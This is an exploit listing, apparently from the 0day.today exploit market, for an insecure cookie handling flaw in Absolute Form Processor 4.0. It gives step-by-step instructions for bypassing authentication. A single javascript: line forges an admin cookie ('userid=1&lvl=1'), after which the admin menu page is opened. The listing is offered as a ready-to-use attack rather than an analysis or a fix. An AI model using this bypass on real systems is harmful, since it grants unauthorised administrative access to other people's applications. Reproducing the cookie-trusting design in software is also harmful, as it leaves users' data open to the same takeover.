[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Absolute Form Processor 4.0 Insecure Cookie Handling Vulnerability

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3974
Category
web applications
Date add
31-10-2008
Platform
asp
==================================================================
Absolute Form Processor 4.0 Insecure Cookie Handling Vulnerability
==================================================================


[~] Author : Hakxer
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Form Processor [see script] http://www.xigla.com/absolutefpnet/demo.htm
[~] Team : EgY Coders 
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutefpnet/demo/login.aspx
Second Execute JS Code 
[~] javascript:document.cookie="xlaAFPDEMOadmin=userid=1&lvl=1&createforms=checked";
Now Go to http://www.xigla.com/absolutefpnet/demo/menu.aspx

--- Proud To Be A Muslim ---

# _=END=_ # 



#  0day.today [2024-11-14]  #